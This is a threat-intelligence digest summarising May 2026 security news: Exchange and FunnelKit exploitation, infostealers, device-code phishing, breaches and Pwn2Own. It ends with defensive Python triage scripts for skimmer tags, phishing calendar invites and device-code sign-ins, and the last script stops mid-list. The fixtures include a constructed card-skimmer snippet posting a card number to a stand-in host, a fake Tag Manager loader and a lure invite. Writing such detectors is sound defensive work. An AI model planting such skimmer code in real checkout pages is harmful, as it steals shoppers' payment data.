NCSA Webboard

    Cyber Threat Intelligence 18 May 2026

    Cyber Security News
    • NCSA_THAICERT
      Last edited by NCSA_THAICERT

      Financial Sector

      • GCC Cyber 2026: How Digital Banking Expansion Is Creating a New Attack Surface Attackers Are Already Exploiting
        "The Gulf Cooperation Council (GCC) region has spent the last several years building one of the world’s most ambitious digital economies. Across Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and the UAE, governments and enterprises have accelerated investments in cloud infrastructure, AI-driven services, smart cities, and digital banking technology at a pace rarely seen elsewhere. Banks are rolling out instant payments, embedded finance services, mobile-first platforms, and API-driven ecosystems designed to support a rapidly expanding fintech economy."
        https://cyble.com/blog/gcc-digital-banking-attack-surface-risks-2026/

      Vulnerabilities

      • Claw Chain: Cyera Research Unveil Four Chainable Vulnerabilities In OpenClaw
        "Cyera's research team identified four previously undisclosed vulnerabilities in OpenClaw, one of the most rapidly adopted open-source platforms for autonomous AI agents. Originally launched as “Clawdbot” in late 2025, OpenClaw connects LLMs directly to filesystems, SaaS applications, credentials, and execution environments - and is increasingly deployed across enterprise workflows for IT automation, customer service, and operational integrations with platforms like Telegram, Discord, and Microsoft Agent 365. The four findings - spanning sandbox isolation, identity, and execution validation - were disclosed to the OpenClaw maintainers in April 2026 and have all been patched."
        https://www.cyera.com/blog/claw-chain-cyera-research-unveil-four-chainable-vulnerabilities-in-openclaw
        https://thehackernews.com/2026/05/four-openclaw-flaws-enable-data-theft.html
        https://hackread.com/claw-chain-vulnerabilities-openclaw-ai-servers-risk/
      • Microsoft Silently Patched a CVSS 9.9 Privilege Escalation In Azure Backup For AKS
        "In March 2026, I discovered a privilege escalation vulnerability in Azure Backup for AKS that allowed a user with only the “Backup Contributor” Azure role (zero Kubernetes permissions) to gain cluster-admin on any AKS cluster. CERT/CC validated this finding as VU#284781 on April 16, 2026. Microsoft rejected it, claiming the “attacker already held administrator access.” This was factually incorrect — the vulnerability grants cluster-admin, it does not require it. On May 12, 2026, I confirmed Microsoft has silently patched the behavior without:"
        https://olearysec.com/research/azure-backup-aks-silent-patch/
        https://www.bleepingcomputer.com/news/security/microsoft-rejects-critical-azure-vulnerability-report-no-cve-issued/
      • Microsoft Warns Of Exchange Zero-Day Flaw Exploited In Attack
        "On Thursday, Microsoft shared mitigations for a high-severity Exchange Server vulnerability exploited in attacks that allow threat actors to execute arbitrary code via cross-site scripting (XSS) while targeting Outlook on the web users. Microsoft describes this security flaw (CVE-2026-42897) as a spoofing vulnerability affecting up-to-date Exchange Server 2016, Exchange Server 2019, and Exchange Server Subscription Edition (SE) software. While patches aren't yet available to permanently fix the vulnerability, the company added that the Exchange Emergency Mitigation Service (EEMS) will provide automatic mitigation for Exchange Server 2016, 2019, and SE on-premises servers."
        https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-exchange-zero-day-flaw-exploited-in-attacks/
        https://techcommunity.microsoft.com/blog/exchange/addressing-exchange-server-may-2026-vulnerability-cve-2026-42897/4518498
        https://www.cisa.gov/news-events/alerts/2026/05/15/cisa-adds-one-known-exploited-vulnerability-catalog
        https://thehackernews.com/2026/05/on-prem-microsoft-exchange-server-cve.html
        https://www.infosecurity-magazine.com/news/microsoft-zeroday-exchange-servers/
        https://www.securityweek.com/microsoft-warns-of-exchange-server-zero-day-exploited-in-the-wild/
        https://securityaffairs.com/192204/security/cve-2026-42897-microsoft-confirms-active-exploitation-of-exchange-server-zero-day.html
        https://securityaffairs.com/192240/hacking/u-s-cisa-adds-a-flaw-in-microsoft-exchange-server-to-its-known-exploited-vulnerabilities-catalog.html
      • Critical FunnelKit Vulnerability Threatens 40,000+ WooCommerce Checkouts
        "Sansec is tracking active attacks against Funnel Builder by FunnelKit, a checkout and upsell plugin used on 40,000+ WooCommerce stores. All versions before 3.15.0.3 let unauthenticated attackers inject arbitrary JavaScript into every checkout page on the store. Attackers are planting fake Google Tag Manager scripts into the plugin's 'External Scripts' setting. The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout. FunnelKit has shipped a patched version and is asking all customers to update."
        https://sansec.io/research/funnelkit-woocommerce-vulnerability-exploited
        https://www.bleepingcomputer.com/news/security/funnel-builder-wordpress-plugin-bug-exploited-to-steal-credit-cards/
        https://thehackernews.com/2026/05/funnel-builder-flaw-under-active.html
        https://securityaffairs.com/192260/cyber-crime/attackers-exploit-funnel-builder-bug-to-inject-e-skimmers-into-e-stores.html
      • Chrome 148 Update Patches Critical Vulnerabilities
        "Google this week released a Chrome 148 update that resolves 79 vulnerabilities, including 14 critical-severity bugs across multiple components. The first critical issue is a heap buffer overflow in WebML tracked as CVE-2026-8509, for which the internet giant paid a $43,000 bug bounty. Google has not shared details on the flaw, but its severity rating and the paid amount suggest that it could be exploited for remote code execution. The second critical issue is CVE-2026-8510, an integer overflow weakness in Skia that earned the reporting researcher a $25,000 reward."
        https://www.securityweek.com/chrome-148-update-patches-critical-vulnerabilities/
      • New Windows 'MiniPlasma' Zero-Day Exploit Gives SYSTEM Access, PoC Released
        "A cybersecurity researcher has released a proof-of-concept exploit for a Windows privilege escalation zero-day dubbed 'MiniPlasma' that lets attackers gain SYSTEM privileges on fully patched Windows systems. The exploit was published by a researcher known as Chaotic Eclipse, or Nightmare Eclipse, who released both the source code and a compiled executable on GitHub after claiming that Microsoft failed to properly patch a previously reported 2020 vulnerability. According to the researcher, the flaw impacts the 'cldflt.sys' Cloud Filter driver and its 'HsmOsBlockPlaceholderAccess' routine, which was originally reported to Microsoft by Google Project Zero researcher James Forshaw in September 2020."
        https://www.bleepingcomputer.com/news/microsoft/new-windows-miniplasma-zero-day-exploit-gives-system-access-poc-released/

      Malware

      • Inside The REMUS Infostealer: Session Theft, MaaS, And Rapid Evolution
        "In recent months, a new infostealer malware known as REMUS has emerged across the cybercrime landscape, drawing attention from security researchers and malware analysts. Several technical analyses published in recent months focused on the malware’s capabilities, infrastructure, and similarities to Lumma Stealer, including browser targeting mechanisms, credential theft functionality and more. However, far less attention has been given to the underground operation behind the malware itself."
        https://www.bleepingcomputer.com/news/security/inside-the-remus-infostealer-session-theft-maas-and-rapid-evolution/
      • PureLogs: Delivery Via PawsRunner Steganography
        "The use of steganography in the threat landscape continues to accelerate. Threat actors are increasingly shifting from direct encrypted transfers to a 'legitimate-file-plus-hidden-data' model, effectively masking their next-stage payloads within everyday media. FortiGuard Labs recently uncovered a phishing campaign that abuses environment variables to hide malicious commands and uses PawsRunner as a Steganography Loader to deploy the .NET infostealer PureLogs."
        https://www.fortinet.com/blog/threat-research/purelogs-delivery-via-pawsrunner-steganography
      • From PyInstaller To XWorm V7.4: Infection Chain Analysis
        "Point Wild conducted an in-depth analysis of a suspicious PyInstaller-packed Python sample and identified it as a multi-stage malware loader designed to deploy the XWorm Remote Access Trojan (RAT), specifically associated with the XWorm V7.4 campaign. The sample leveraged multiple layers of obfuscation, staged execution and anti-analysis techniques to conceal its true functionality and evade detection by traditional security controls."
        https://www.pointwild.com/threat-intelligence/from-pyinstaller-to-xworm-v7-4-infection-chain-analysis/
        https://hackread.com/hackers-pyinstaller-amsi-patching-xworm-rat-v7-4/
      • New Calendar Invite Phishing Campaign: ICS Abuse And Post-Delivery Persistence
        "Fortra Intelligence and Research Experts (FIRE) have identified an ongoing campaign combining ConsentFix (also known as device code phishing) to harvest Microsoft account credentials and calendar phishing (or CalPhishing) to bypass security controls and push users closer to the 'trusted' workflow. This activity is likely linked to the EvilTokens AI-enabled phishing kit, which has been known to include calendar phishing as an option. However, CalPhishing appears to be the increasingly preferable method of delivery thanks to its ability to bypass defences."
        https://www.fortra.com/blog/new-calendar-invite-phishing-campaign-ics-abuse-and-post-delivery-persistence
        https://hackread.com/calphishing-eviltokens-kit-outlook-invites-m365/
      • Gremlin Stealer's Evolved Tactics: Hiding In Plain Sight With Resource Files
        "This article examines new obfuscation techniques the Gremlin stealer malware uses to conceal malicious payloads within embedded resources. We analyze a variant protected by a sophisticated commercial packing utility that employs instruction virtualization, transforming the original code into a custom, non-standard bytecode executed by a private virtual machine. Gremlin stealer siphons sensitive information from compromised systems and exfiltrates it to attacker‑controlled servers for potential publication or sale. It targets web browsers, system clipboard and local storage to exfiltrate sensitive information like:"
        https://unit42.paloaltonetworks.com/gremlin-stealer-evolution/
        https://www.infosecurity-magazine.com/news/gremlin-stealer-evolves-into/
      • Cato CTRL Threat Research: Suspected China-Linked Threat Actor Targets Global Manufacturer With Undocumented TencShell Malware
        "In April 2026, Cato CTRL identified and blocked an attempted intrusion against a global manufacturing customer involving TencShell, a previously undocumented, Go-based implant derived from the open-source Rshell C2 framework. The activity appeared in traffic associated with a third-party user connected to the customer environment. The attack chain used a first-stage dropper, Donut shellcode, a masqueraded .woff web-font resource, memory injection, and web-like C2 communication. We assess the activity as suspected China-linked based on the apparent Rshell lineage, Tencent-themed API impersonation, and infrastructure patterns. While this pattern is relevant to our suspected China-linked assessment, it is not sufficient on its own for attribution."
        https://www.catonetworks.com/blog/cato-ctrl-suspected-china-linked-threat-actor-targets-global-manufacturer/
        https://www.infosecurity-magazine.com/news/china-hackers-tencshell-malware/
      • Kazuar: Anatomy Of a Nation-State Botnet
        "Kazuar, a sophisticated malware family attributed to the Russian state actor Secret Blizzard, has been under constant development for years and continues to evolve in support of espionage-focused operations. Over time, Kazuar has expanded from a relatively traditional backdoor into a highly modular peer-to-peer (P2P) botnet ecosystem designed to enable persistent, covert access to target environments. This upgrade aligns with Secret Blizzard’s broader objective of gaining long-term access to systems for intelligence collection. The threat actor has historically targeted organizations in the government and diplomatic sector in Europe and Central Asia, as well as systems in Ukraine previously compromised by Aqua Blizzard, very likely for the purpose of obtaining information supporting Russia’s foreign policy and military objectives."
        https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/
        https://thehackernews.com/2026/05/turla-turns-kazuar-backdoor-into.html
        https://www.bleepingcomputer.com/news/security/russian-hackers-turn-kazuar-backdoor-into-modular-p2p-botnet/
        https://securityaffairs.com/192231/apt/russian-apt-turla-builds-long-term-access-tool-with-kazuar-botnet-evolution.html
      • Tinker Tailor Soldier: Paper Werewolf’s Latest Toolkit
        "In March–April 2026, we uncovered a new campaign by Paper Werewolf targeting Russian industrial, financial, and transport organizations. The analysis revealed several previously undescribed malware instances, including a custom‑built stealer we dubbed PaperGrabber, loaders and downloaders written in C++, C#, Python, and JavaScript, and a novel shellcode‑based implant for the Mythic post‑exploitation framework."
        https://bi.zone/eng/expertise/blog/kamen-nozhnitsy-bumaga-novyy-instrumentariy-v-atakakh-klastera-paper-werewolf/
      • Tycoon 2FA Operators Adopt OAuth Device Code Phishing
        "In late April 2026, the eSentire Threat Response Unit (TRU) analyzed a phishing campaign that combines two trends TRU has tracked over the past year. The first is the continued operation of the Tycoon 2FA Phishing-as-a-Service (PhaaS) kit despite the March 2026 coalition takedown led by Microsoft and Europol in collaboration with eSentire and other industry partners; the second is the broader shift toward abusing OAuth Device Authorization Grant flows to compromise Microsoft 365 accounts."
        https://www.esentire.com/blog/tycoon-2fa-operators-adopt-oauth-device-code-phishing
        https://www.bleepingcomputer.com/news/security/tycoon2fa-hijacks-microsoft-365-accounts-via-device-code-phishing/
      • Scammers Send Physical Phishing Letters To Steal Ledger Wallet Seed Phrases
        "Crypto wallet owners using Ledger hardware wallets are being targeted through physical mail, with scammers impersonating the company in a campaign designed to steal recovery seed phrases. The operation uses printed letters that look official, complete with Ledger branding, a reference number, and a fake security notice warning recipients about an urgent “Quantum Resistance” update. One example of the scam circulating online shows an Italian language version addressed to a customer in Italy, suggesting the attackers are tailoring the campaign based on regional customer data. The letter claims users must complete a mandatory security upgrade for their Ledger device before a deadline or risk losing wallet functionality."
        https://hackread.com/scammers-physical-phishing-letters-ledger-wallet-seed/

      Breaches/Hacks/Leaks

      • American Lending Center Data Breach Affects 123,000 Individuals
        "American Lending Center this week revealed that a data breach discovered last year has impacted more than 123,000 individuals. American Lending Center (ALC) is a California-based non-bank lender that manages a $3 billion portfolio specializing in government-guaranteed small business loans. The organization is notifying individuals affected by the data breach that information such as names, dates of birth, and SSNs may have been stolen in a ransomware attack detected in July 2025."
        https://www.securityweek.com/american-lending-center-data-breach-affects-123000-individuals/
      • More Than $10 Million Stolen From Crypto Platform THORChain
        "Cryptocurrency platform THORChain said more than $10 million was stolen during a security incident on Friday morning. The cyberattack was first identified by blockchain security firm Peckshield and cryptocurrency investigator Zachary Wolk, who goes by the online alias ZachXBT. Around 6 am EST, both reported that more than 36 Bitcoin, worth about $3 million, and another $7 million in other coins were siphoned from THORChain. THORChain published its own statement shortly after confirming the incident."
        https://therecord.media/more-than-10-million-stolen-crypto-platform-thorchain
      • Grafana GitHub Token Breach Led To Codebase Download And Extortion Attempt
        "Grafana has disclosed that an 'unauthorized party' obtained a token that granted them the ability to access the company's GitHub environment and download its codebase. 'Our investigation has determined that no customer data or personal information was accessed during this incident, and we have found no evidence of impact to customer systems or operations,' Grafana said in a series of posts on X. The company also said it immediately launched a forensic analysis upon discovering the activity and that it identified the source of the leak, adding the compromised credentials have since been invalidated, and extra security measures have been implemented to secure against unauthorized access."
        https://thehackernews.com/2026/05/grafana-github-token-breach-led-to.html
        https://hackread.com/grafana-source-code-theft-rejected-ransom-demand/

      General News

      • Pwn2Own Berlin 2026, Day One: $523,000 Paid Out, AI Products Fall
        "Day one of Pwn2Own Berlin 2026 featured 22 entries targeting widely used technologies, including browsers, operating systems, AI platforms, and NVIDIA infrastructure. By the end of the day, researchers demonstrated 24 unique zero-day vulnerabilities and earned a total of $523,000 in rewards, highlighting ongoing security risks across major enterprise and consumer software ecosystems. Orange Tsai of the DEVCORE Research Team made the headlines; he chained four separate logic bugs to escape the Microsoft Edge sandbox, a technically demanding achievement that earned him $175,000 and 17.5 Master of Pwn points in a single attempt. It was the kind of result that reminds you why this competition exists: not to embarrass vendors, but to surface flaws in controlled conditions before someone with worse intentions finds them first."
        https://securityaffairs.com/192183/hacking/pwn2own-berlin-2026-day-one-523000-paid-out-ai-products-fall.html
      • Microsoft Exchange, Windows 11 Hacked On Second Day Of Pwn2Own
        "During the second day of Pwn2Own Berlin 2026, competitors collected $385,750 in cash awards after exploiting 15 unique zero-day vulnerabilities in multiple products, including Windows 11, Microsoft Exchange, and Red Hat Enterprise Linux for Workstations. The Pwn2Own Berlin 2026 hacking competition takes place at the OffensiveCon conference from May 14 to May 16 and focuses on enterprise technologies and artificial intelligence. Security researchers can earn over $1,000,000 in cash and prizes by hacking fully patched products in the web browser, enterprise applications, cloud-native/container environments, virtualization, local privilege escalation, servers, local inference, and LLM categories."
        https://www.bleepingcomputer.com/news/security/pwn2own-day-two-hackers-demo-microsoft-exchange-windows-11-red-had-enterprise-linux-zero-days/
        https://securityaffairs.com/192209/security/pwn2own-berlin-2026-day-two-385750-more-microsoft-exchange-falls-and-the-running-total-crosses-900k.html
      • Pwn2Own Berlin 2026, Day Three: DEVCORE Crowned Master Of Pwn, $1.298 Million Total
        "Pwn2Own Berlin 2026 ended after three intense days, with participants discovering 47 unique zero-days, and earning $1,298,250 in total payouts. Pwn2Own Berlin 2026 wrapped up at OffensiveCon on Saturday with a final day that sealed DEVCORE’s dominance across every metric that matters. That's a wrap on Pwn2Own Berlin 2026! 🏆 $1,298,250 awarded. 47 unique 0-days. 3 days of absolute chaos. And talk about main character energy – congrats to DEVCORE for claiming Master of Pwn with 50.5 points and $505,000 – they never slowed down. See you next year! #Pwn2Own… pic.twitter.com/ZcWN8VPLDS — TrendAI Zero Day Initiative (@thezdi) May 16, 2026"
        https://securityaffairs.com/192250/hacking/pwn2own-berlin-2026-day-three-devcore-crowned-master-of-pwn-1-298-million-total.html
      • Microsoft Backpedals: Edge To Stop Loading Passwords Into Memory
        "Microsoft is updating the Edge web browser to ensure it no longer loads saved passwords into process memory in clear text at startup after previously stating it was 'by design.' This behavior was disclosed on May 4 by security researcher Tom Jøran Sønstebyseter Rønning, who demonstrated that all credentials stored in the Edge built-in password manager were decrypted on launch and kept in memory even when not in use. Rønning also released a proof-of-concept (PoC) tool that would allow attackers with Administrator privileges to dump passwords from other users' Edge processes (without admin privileges, the PoC only allows accessing Edge processes launched by the same user)."
        https://www.bleepingcomputer.com/news/microsoft/microsoft-edge-to-stop-loading-cleartext-passwords-in-memory-on-startup/
      • The Boring Stuff Is Dangerous Now
        "Are you freaking out? It feels like the entire industry is losing its head over the collision of two huge security pressures. First, every development team has suddenly been mandated to use AI coding tools, resulting in thousands of new bugs and misconfigurations. This has coincided with the announcement that, if Claude Mythos was unleashed, it would exploit every unknown vulnerability out there. It’s enough to make everyone from triagers and CISOs want to give up. Let’s consider how both scenarios play out, and what it means for vulnerability discovery, vulnerability management, and actual risk reduction."
        https://www.darkreading.com/cyber-risk/ai-code-and-agents-forces-defenders-adapt
      • The Next Cybersecurity Challenge May Be Verifying AI Agents
        "For the past two decades, cybersecurity has largely been a story about protecting humans from machines: blocking malware, filtering phishing emails, companies mitigating DDoS attacks, and patching software vulnerabilities before attackers exploit them. The adversary was clear. The surface was known. The playbook, while imperfect, was at least legible, but that story is now changing. The next major frontier in cybersecurity is not defending against AI. It is figuring out how to trust it."
        https://hackread.com/next-cybersecurity-challenge-verifying-ai-agents/

      References
      Electronic Transactions Development Agency (ETDA)
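The FunnelKit item under Vulnerabilities describes skimmer scripts planted in the plugin's external-scripts setting and disguised as Google Tag Manager snippets. The following triage script is an added example for this digest, not FunnelKit's or Sansec's code: given the stored snippets as strings (exported from the plugin settings screen or a database dump, which is assumed), it flags any snippet that looks like a Tag Manager loader but fetches from a host Google does not serve from, plus inline code that uses obfuscation primitives or reads card fields. The three sample snippets and the look-alike hosts are constructed.

```python
"""Triage of checkout-page 'external script' snippets for look-alike tag loaders.

Added example, not FunnelKit's or Sansec's code.  It assumes the stored
snippets have already been exported to Python strings; the three sample
snippets below are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Hosts Google actually serves Tag Manager / Analytics from.
TRUSTED_TAG_HOSTS = {
    "www.googletagmanager.com", "googletagmanager.com", "www.google-analytics.com",
}
# Strings that make a snippet *look* like a Tag Manager / Analytics snippet.
TAG_MARKERS = re.compile(r"gtm\.js|GTM-[A-Z0-9]{4,}|dataLayer|googletagmanager", re.I)
# Any absolute URL, whether in a src="" attribute or built inside script text.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"<>]*)?")
# Constructs a real tag snippet has no reason to use.
OBFUSCATION = re.compile(
    r"\beval\s*\(|\batob\s*\(|fromCharCode|document\.write\s*\(|unescape\s*\(", re.I)
# Form fields a card skimmer has to read.
CARD_FIELDS = re.compile(r"card[-_ ]?number|\bcvv\b|\bcvc\b|ccnumber|expir", re.I)


def triage_snippet(snippet, known_hosts=frozenset()):
    """Return (reason, detail) findings for one stored snippet.

    known_hosts: extra hosts the store legitimately loads scripts from
    (its own CDN, payment provider, ...); every other host is reported.
    """
    findings = []
    trusted = TRUSTED_TAG_HOSTS | set(known_hosts)
    looks_like_tag = bool(TAG_MARKERS.search(snippet))
    for url in URL_RE.findall(snippet):
        host = urlparse(url).netloc.lower()
        if host in trusted:
            continue
        # A snippet that claims to be GTM but loads from elsewhere is the exact
        # pattern in the advisory; anything else is merely an unlisted host.
        reason = "gtm_lookalike_offsite" if looks_like_tag else "unlisted_external_host"
        findings.append((reason, url))
    m = OBFUSCATION.search(snippet)
    if m:
        findings.append(("obfuscation", m.group(0)))
    m = CARD_FIELDS.search(snippet)
    if m:
        findings.append(("reads_card_fields", m.group(0)))
    return findings


def triage_all(snippets, known_hosts=frozenset()):
    """Map snippet name -> findings, keeping only snippets that have findings."""
    report = {}
    for name, body in snippets.items():
        hits = triage_snippet(body, known_hosts)
        if hits:
            report[name] = hits
    return report


# Constructed samples.  real_gtm has the shape of Google's standard container
# snippet; fake_gtm is the same text pointed at a look-alike host; inline_skim
# reads a card field and posts it to a third-party host.
_GTM_TEMPLATE = (
    "<!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];"
    "w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});"
    "var f=d.getElementsByTagName(s)[0],j=d.createElement(s),"
    "dl=l!='dataLayer'?'&l='+l:'';j.async=true;"
    "j.src='https://%s/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);"
    "})(window,document,'script','dataLayer','GTM-ABCD123');</script>"
)
SAMPLE_SNIPPETS = {
    "real_gtm": _GTM_TEMPLATE % "www.googletagmanager.com",
    "fake_gtm": _GTM_TEMPLATE % "gtm-metrics.example.net",
    "inline_skim": (
        "<script>document.addEventListener('submit',function(){"
        "var c=document.querySelector('#card-number').value;"
        "fetch('https://stats-collect.example.net/c',{method:'POST',body:btoa(c)});"
        "});</script>"
    ),
}

if __name__ == "__main__":
    for name, hits in triage_all(SAMPLE_SNIPPETS).items():
        print(name, hits)
```

The host allow-list is deliberately short: on a real store, pass the payment provider and CDN hosts as `known_hosts` and treat anything left over as a finding to read by hand, since the advisory's point is that the malicious snippet is indistinguishable from analytics at a glance.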

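The Fortra item under Malware describes calendar phishing delivered as .ics invites that land in the calendar regardless of what happens to the e-mail. The parser and triage below are an added example for this digest, not Fortra's code: it unfolds an iCalendar file per RFC 5545, extracts the organizer and every link carried in the description, location, URL and HTML-alternate properties, and reports anything outside a caller-supplied set of trusted domains. Treating a recurrence rule as a persistence signal is this example's own heuristic, and both sample invites are constructed.

```python
"""Triage of a calendar invite (.ics) for the CalPhishing pattern.

Added example, not Fortra's code.  Assumptions: `trusted_domains` is the set
of domains an invite may legitimately come from or link to; the RRULE and
organizer-domain heuristics are this example's own; both sample invites are
constructed.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>\\]+")  # stops at the ICS escape character '\'
LINK_PROPS = ("DESCRIPTION", "LOCATION", "URL", "COMMENT", "X-ALT-DESC")


def unfold(ics_text):
    """RFC 5545 section 3.1: a line starting with SPACE or HTAB continues the previous line."""
    lines = []
    for raw in ics_text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def split_property(line):
    """Split 'NAME;P=V;Q="a:b":value' into (NAME, {P: V, ...}, value), honouring quotes."""
    in_quotes, colon = False, None
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            colon = i
            break
    if colon is None:
        return None
    head, value = line[:colon], line[colon + 1:]
    parts, buf, in_quotes = [], "", False
    for ch in head:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            parts.append(buf)
            buf = ""
        else:
            buf += ch
    parts.append(buf)
    params = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        params[k.upper()] = v.strip('"')
    return parts[0].upper(), params, value


def parse_invite(ics_text):
    """Return (METHOD, [event, ...]); each event maps property name -> [(params, value)]."""
    method, events, current = None, [], None
    for line in unfold(ics_text):
        up = line.upper()
        if up == "BEGIN:VEVENT":
            current = {}
            continue
        if up == "END:VEVENT":
            events.append(current)
            current = None
            continue
        parsed = split_property(line)
        if parsed is None:
            continue
        name, params, value = parsed
        if name == "METHOD" and current is None:
            method = value.strip().upper()
        elif current is not None:
            current.setdefault(name, []).append((params, value))
    return method, events


def _trusted(host, trusted_domains):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def triage_invite(ics_text, trusted_domains):
    """Return ordered, de-duplicated (reason, detail) findings for every VEVENT."""
    _, events = parse_invite(ics_text)
    findings = []
    for ev in events:
        for _, org in ev.get("ORGANIZER", []):
            addr = org.strip().lower()
            addr = addr[len("mailto:"):] if addr.startswith("mailto:") else addr
            domain = addr.rpartition("@")[2]
            if domain and not _trusted(domain, trusted_domains):
                findings.append(("organizer_external", addr))
        for prop in LINK_PROPS:
            for _, raw in ev.get(prop, []):
                # Scan the raw (still escaped) value so '\,' and '\n' terminate a URL.
                for url in URL_RE.findall(raw):
                    url = url.rstrip(".,;)")
                    if not _trusted(urlparse(url).hostname or "", trusted_domains):
                        findings.append(("link_offsite", url))
        # Heuristic of this example: a recurring lure re-surfaces after the mail is gone.
        for _, rule in ev.get("RRULE", []):
            findings.append(("recurring", rule))
    seen, out = set(), []
    for f in findings:
        if f not in seen:
            seen.add(f)
            out.append(f)
    return out


# Constructed samples: a lure invite and an ordinary meeting.
PHISHING_INVITE = (
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nPRODID:-//constructed//EN\r\nMETHOD:REQUEST\r\n"
    "BEGIN:VEVENT\r\nUID:constructed-lure-1@example.net\r\n"
    "DTSTAMP:20260515T080000Z\r\nDTSTART:20260518T090000Z\r\nDTEND:20260518T093000Z\r\n"
    "RRULE:FREQ=DAILY;COUNT=30\r\n"
    'ORGANIZER;CN="IT Security":mailto:security-alerts@example.net\r\n'
    "ATTENDEE;RSVP=TRUE;CN=Alice:mailto:alice@example.com\r\n"
    "SUMMARY:ACTION REQUIRED: verify your Microsoft 365 sign-in\r\n"
    "LOCATION:https://login-verify.example.net/device\r\n"
    "DESCRIPTION:Your session expires today. Confirm your identity at\r\n"
    "  https://login-verify.example.net/device?code=ABCDEFG\\, then close this invite.\r\n"
    'X-ALT-DESC;FMTTYPE=text/html:<a href="https://login-verify.example.net/device">Verify</a>\r\n'
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)
BENIGN_INVITE = (
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nMETHOD:REQUEST\r\nBEGIN:VEVENT\r\n"
    "UID:constructed-meeting-1@example.com\r\n"
    "DTSTART:20260519T100000Z\r\nDTEND:20260519T103000Z\r\n"
    "ORGANIZER;CN=Bob:mailto:bob@example.com\r\nSUMMARY:Weekly sync\r\n"
    "DESCRIPTION:Join at https://meet.example.com/abc-defg\r\n"
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    print(triage_invite(PHISHING_INVITE, {"example.com"}))
    print(triage_invite(BENIGN_INVITE, {"example.com"}))
```

Run it against the invites a mail gateway already extracts from message attachments; the organizer check catches the common case where the sender domain passes authentication but the invite's ORGANIZER is a different, external address.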
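Both the Fortra calendar-phishing item and the eSentire Tycoon 2FA item under Malware turn on the same primitive: an OAuth device authorization grant in which the victim authorizes a device they do not control, so the resulting sign-in shows up in the tenant's logs under the attacker's client. The detection below is an added example for this digest, not eSentire's or Fortra's content. It consumes records shaped like Microsoft Graph `signIns` entries (the field names are Graph's; the records, the IP addresses and the list of sensitive apps are constructed or assumed) and alerts on successful device-code sign-ins whose source country or IP does not match the user's recent interactive sign-ins.

```python
"""Baseline-deviation check for OAuth device-code sign-ins.

Added example, not eSentire's or Fortra's detection content.  Records are
shaped like Microsoft Graph signIns entries (field names are Graph's; the
sample records are constructed).  Thresholds and SENSITIVE_APPS are this
example's assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Apps whose tokens let an attacker read mail or enumerate the tenant (assumption).
SENSITIVE_APPS = {"Microsoft Graph", "Office 365 Exchange Online", "Microsoft Office"}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_device_code_abuse(signins, lookback_days=30):
    """Return one alert per suspicious device-code sign-in.

    Baseline = the user's successful non-device-code sign-ins in the
    `lookback_days` before the event.  Alert when the device-code sign-in
    comes from a country absent from the baseline, or from a new IP *and*
    targets a sensitive app.  A user with no baseline at all is also reported.
    """
    by_user = defaultdict(list)
    for e in signins:
        by_user[e["userPrincipalName"].lower()].append(e)
    alerts = []
    for user, events in by_user.items():
        events.sort(key=lambda e: _ts(e["createdDateTime"]))
        for e in events:
            # errorCode 0 is a successful sign-in in these logs; skip failures.
            if e.get("authenticationProtocol") != "deviceCode" or e["status"]["errorCode"] != 0:
                continue
            t = _ts(e["createdDateTime"])
            window_start = t - timedelta(days=lookback_days)
            baseline = [
                b for b in events
                if b.get("authenticationProtocol") != "deviceCode"
                and b["status"]["errorCode"] == 0
                and window_start <= _ts(b["createdDateTime"]) < t
            ]
            known_ips = {b["ipAddress"] for b in baseline}
            known_countries = {b["location"]["countryOrRegion"] for b in baseline}
            reasons = []
            if not baseline:
                reasons.append("no_baseline")
            if e["ipAddress"] not in known_ips:
                reasons.append("new_ip")
            if e["location"]["countryOrRegion"] not in known_countries:
                reasons.append("new_country")
            if e.get("appDisplayName") in SENSITIVE_APPS:
                reasons.append("sensitive_app")
            if "new_country" in reasons or ("new_ip" in reasons and "sensitive_app" in reasons):
                alerts.append({
                    "user": user,
                    "time": e["createdDateTime"],
                    "ip": e["ipAddress"],
                    "app": e.get("appDisplayName"),
                    "reasons": reasons,
                })
    return alerts


def _signin(upn, when, ip, country, app, protocol="none", error=0):
    """Build a record in the shape of a Graph signIn; all values are constructed."""
    return {
        "userPrincipalName": upn, "createdDateTime": when, "ipAddress": ip,
        "location": {"countryOrRegion": country}, "appDisplayName": app,
        "authenticationProtocol": protocol, "status": {"errorCode": error},
    }


# Constructed sign-in history (RFC 5737 documentation IP ranges).
SAMPLE_SIGNINS = [
    _signin("alice@example.com", "2026-05-01T08:02:00Z", "203.0.113.10", "NL", "Microsoft Office"),
    _signin("alice@example.com", "2026-05-10T09:15:00Z", "203.0.113.10", "NL", "Microsoft Teams"),
    # Device-code grant for Alice from an IP and country she has never used: the phishing pattern.
    _signin("alice@example.com", "2026-05-12T14:41:00Z", "198.51.100.7", "US", "Microsoft Graph", "deviceCode"),
    _signin("bob@example.com", "2026-05-05T10:00:00Z", "203.0.113.20", "NL", "Microsoft Office"),
    # Bob using a CLI tool from his usual address: device code is legitimate here.
    _signin("bob@example.com", "2026-05-11T11:30:00Z", "203.0.113.20", "NL", "Microsoft Azure CLI", "deviceCode"),
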